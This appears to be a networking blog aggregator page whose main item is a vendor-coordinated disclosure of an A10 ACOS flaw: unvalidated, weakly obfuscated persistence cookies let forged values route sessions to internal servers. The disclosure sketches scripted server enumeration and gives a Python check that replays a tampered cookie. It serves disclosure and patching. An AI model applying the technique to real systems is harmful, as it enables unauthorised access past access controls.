I really wish I would have had something like the Cyber Range for myself back when I was fighting virus outbreaks and trying to tame Conficker infections. Because having a sandbox to test myself against scripted scenarios with variations run by live people beats watching a video about how to “easily” fix a problem you may never see in that form. I applaud Palo Alto Networks for their approach to teaching security to folks and I can’t wait to see how Pamela grows the Cyber Range program!

For more information about Palo Alto Networks and Cyber Range, make sure to visit http://Paloaltonetworks.com/CyberRange/

by networkingnerd at June 07, 2019 03:01 PM

ipSpace.net Blog (Ivan Pepelnjak)

As Expected: Where Have All the SDN Controllers Gone?

Roy Chua (SDx Central) published a blog post titled “Where Have All the SDN Controllers Gone” a while ago describing the gradual disappearance of SDN controller hype.

No surprise there - some of us were pointing out the gap between marketing and reality years ago.

It was evident to anyone familiar with how networking actually works that in a generic environment the drawbacks of orthodox centralized control plane SDN approach far outweigh its benefits. There are special use cases like intelligent patch panels where a centralized control plane makes sense.

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 07, 2019 05:07 AM

Potaroo blog

Happy Birthday BGP

The first RFC describing BGP, RFC 1105, was published in June 1989, thirty years ago. That makes BGP a venerable protocol in the Internet context and, considering that it holds the Internet together, it is still a central piece of the Internet's infrastructure. How has this critically important routing protocol fared over these thirty years and what are its future prospects? Is BGP approaching its dotage or will it be a feature of the Internet for decades to come?

June 07, 2019 02:00 AM


June 06, 2019

Moving Packets

A10 Networks ACOS Critical Insecure Cookie Vulnerability 2 of 2

The following summarizes an HTTP persistence cookie vulnerability that I identified in A10 ACOS ADC software. This was disclosed to A10 Networks in June 2016 and has now been resolved.

A10 Networks Cookie Vulnerability

As noted in a previous post, ACOS uses insecure HTTP/HTTPS persistence cookies, which can allow a malicious user to craft a cookie determining the server and port to which a persistent session should be sent. In addition, it was discovered that for vports using the default (“port-based”) HTTP cookie persistence type, ACOS does not perform a check to ensure that the server/port defined in the cookie is within the configured service-group for that VIP.

The only sanity check appears to be to ensure that the server IP read from the cookie has been configured on the A10 within the same partition. If that constraint is met, packets will be forwarded by ACOS to the real server based solely on the value contained in the cookie. This is extremely serious as it allows a malicious user to connect, for example, through a public VIP and access back end servers used by other VIPs, including those only accessible via internal IPs.

SUMMARY OF VULNERABILITY

When using a vport configured for default (port-based) HTTP cookie-based persistence, a cookie submitted to that vport with the correct name is trusted without any validation of the information contained within.

This would not be an issue if the cookies were secure and thus invulnerable to tampering; however, given that the cookies use weakly obfuscated values, it is trivial to generate arbitrary encoded IP/port cookie values and by doing so cause the A10 to blindly redirect HTTP sessions to any accessible internal HTTP server.

The implications of this are wide ranging. Enumerating the available servers on an internal network is a simple scripting exercise and once completed, custom cookie creation can be used to direct an IP connection to any valid back end server. For example, if there is an ACL applied to a VIP which limits access to specific IP addresses, it is likely possible to access that restricted service by accessing a public VIP on the same A10 ADC which uses cookie persistence, and using a custom cookie to redirect the incoming session to a back end server for the restricted service. Depending on the implemented architecture of the A10 ADC, the ability to redirect sessions to any available server could potentially expose internal HTTP servers to the Internet through apparently unrelated public VIPs.

SOFTWARE VERSIONS TESTED:

This vulnerability was discovered and validated initially in ACOS 2.7.2-P4-SP2 and reconfirmed most recently in ACOS 4.1.1-P3.

VULNERABLE VERSIONS

This behavior has been core to persistence cookies until now, so it can be reasonably stated that this vulnerability exists in:

  • ACOS 2.7.2 initial release and up to 2.7.2-P10 inclusive
  • ACOS 4.0 initial release up to 4.1.1-P5 inclusive

WORKAROUNDS

One mitigation is to configure all cookie persistence templates with the service-group option; however, enabling this will in turn mean disclosing the service-group name in the cookies. That disclosure may be a lesser risk than continued exposure to this vulnerability, so should be assessed for use as a temporary workaround if a software upgrade is not possible.

FIXED IN

A10 Networks has issued updated software which include a fix for this vulnerability :

  • ACOS 2.7.2-P11 (June 2017)
  • ACOS 4.1.1-P6 (November 2017)

A10 Networks tracked this vulnerability under ID 368800.

AUTHOR / DISCOVERER

John Herbert (http://movingpackets.net)

Vulnerability Details

HTTP persistence cookies generated by A10 ACOS (Advanced Core Operating System) can take one of four forms depending on the match-type defined within the persistence cookie template:

Match-Type            Cookie Will Contain
(none) (default)      Real server IP and port
server                Real server IP
service-group         Service-group + real server IP and port
server service-group  Service-group + real server IP

The service-group configuration option implies that the ADC will ensure that the returning client will go to the same service-group as it did previously, checking the IP (and optionally, port) defined in the cookie sent by the client for membership in the selected service-group.

Without the service-group option in place, the cookie is only examined (or created, if missing) the first time a client connects to a vport, after which the cookie is trusted when presented by the client. Assuming that a connection can be made to the destination, the session will be directed to the IP and port specified in the cookie.

The weak obfuscation used by ACOS to hide the IP and port information in HTTP persistence cookies means that it is possible for a malicious client to send a cookie value that the A10 ADC will implicitly trust. In turn, the ADC will faithfully create a proxied HTTP connection to the IP and port specified in the cookie, so long as the specified destination server is defined somewhere in the partition’s configuration. If routing and source-NAT allow the A10 ADC to make a connection to the requested IP/port on behalf of the client, it will be made.

One limitation to this technique is that if the vport being accessed by the malicious user is configured with a server-ssl template to encrypt traffic between the ADC and the real server, any maliciously redirected connection attempts will also be made using SSL, which restricts connectivity to server ports running SSL. The client-side protocol is irrelevant (HTTP or HTTPS), as a cookie can be supplied by the client over either protocol.

Exploitation

The implications should be obvious. Making an initial HTTP/HTTPS connection to a vport will generate a valid cookie from which the cookie name and the real server and port can easily be extracted. It is then simple to create an automated tool that can create new (false) values for the named cookie and thus scan for available HTTP servers, checking common ports, perhaps starting on the IP subnet extracted from the original persistence cookie.

The cookie sent to the client on first connection to a vport configured using the default cookie persistence type will look like this:

sto-id-[vport]   ABMIGEAKFAAA

The [vport] field is usually a 5-digit integer, but for the purposes of a cookie attack all a would-be attacker needs to do is note down the entire cookie name so it can be reused when sending a bogus value to the ADC. Creating false values is made simple courtesy of the weak encryption in the cookie.
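
If you want to verify whether an ADC you are authorised to test validates these cookies, a check along the following lines is enough (Python with the requests library; the URL, cookie name and replayed value are placeholders, and this deliberately does not reproduce the real ACOS encoding — it simply replays a modified value and observes whether the ADC honours it):

import requests

VIP_URL = "https://vip.example.com/"   # placeholder: a VIP you own and are authorised to test
COOKIE_NAME = "sto-id-12345"           # placeholder: copy the real cookie name from the first response

# Step 1: initial request; the ADC hands back a persistence cookie.
first = requests.get(VIP_URL, verify=False)
print("original persistence cookie:", first.cookies.get(COOKIE_NAME))

# Step 2: replay the request with a tampered cookie value and compare behaviour.
# A fixed ADC (or one using a service-group match-type) should ignore or reset an
# invalid value; a vulnerable one will attempt to honour it.
tampered = "AAAAAAAAAAAA"              # placeholder value, not a real encoding
second = requests.get(VIP_URL, cookies={COOKIE_NAME: tampered}, verify=False)
print("status with tampered cookie:", second.status_code)
print("cookie returned by ADC:", second.cookies.get(COOKIE_NAME))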

Recommendation

Users of A10 Networks ACOS 2.7.2 and 4.x using cookie-based persistence should upgrade immediately to the fixed-in versions outlined above, or higher. If that is not possible, consider avoiding the default port-based HTTP persistence cookies.

If you liked this post, please do click through to the source at A10 Networks ACOS Critical Insecure Cookie Vulnerability 2 of 2 and give me a share/like. Thank you!

by John Herbert at June 06, 2019 04:12 PM

ipSpace.net Blog (Ivan Pepelnjak)

Stop Using GUI to Configure SDN or Intent-Based Products

This blog post was initially sent to subscribers of my SDN and Network Automation mailing list. Subscribe here.

At the end of my vNIC 2018 keynote speech I made a statement along these lines:

The moment you start using GUI with an SDN product you’re back to square one.

That claim confused a few people – Mark left this comment on my blog:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 06, 2019 06:18 AM